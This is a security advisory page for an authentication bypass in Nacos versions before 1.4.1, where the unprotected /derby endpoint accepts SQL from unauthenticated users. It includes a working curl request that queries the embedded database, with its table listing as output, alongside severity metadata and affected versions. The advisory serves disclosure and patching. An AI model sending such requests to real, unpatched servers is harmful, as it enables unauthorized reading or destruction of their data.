GHSA-xv5h-v7jh-p2qh

Suggest an improvement
Source
https://github.com/advisories/GHSA-xv5h-v7jh-p2qh
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-xv5h-v7jh-p2qh/GHSA-xv5h-v7jh-p2qh.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-xv5h-v7jh-p2qh
Aliases
Published
2021-04-27T20:09:25Z
Modified
2024-12-02T05:43:54.525943Z
Summary
Authentication bypass for specific endpoint
Details

The ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.

For example, the following request will list the tables of the database:

❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
{"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}% 

These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)

Database specific
{
    "nvd_published_at": "2021-04-27T21:15:00Z",
    "cwe_ids": [
        "CWE-306"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-27T20:08:49Z"
}
References

Affected packages

Maven / com.alibaba.nacos:nacos-common

Package

Name
com.alibaba.nacos:nacos-common
View open source insights on deps.dev
Purl
pkg:maven/com.alibaba.nacos/nacos-common

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.4.1

Affected versions

0.*

0.1.0
0.2.0
0.2.1-RC1
0.2.1
0.3.0-RC1
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.8.0
0.8.1
0.8.2
0.9.0
0.9.1

1.*

1.0.0-RC1
1.0.0-RC2
1.0.0-RC3
1.0.0-RC4
1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0-beta.0
1.2.0-beta.1
1.2.0
1.2.1
1.3.0
1.3.1-BETA
1.3.1-BETA.1
1.3.1
1.3.2
1.3.3
1.4.0-BETA
1.4.0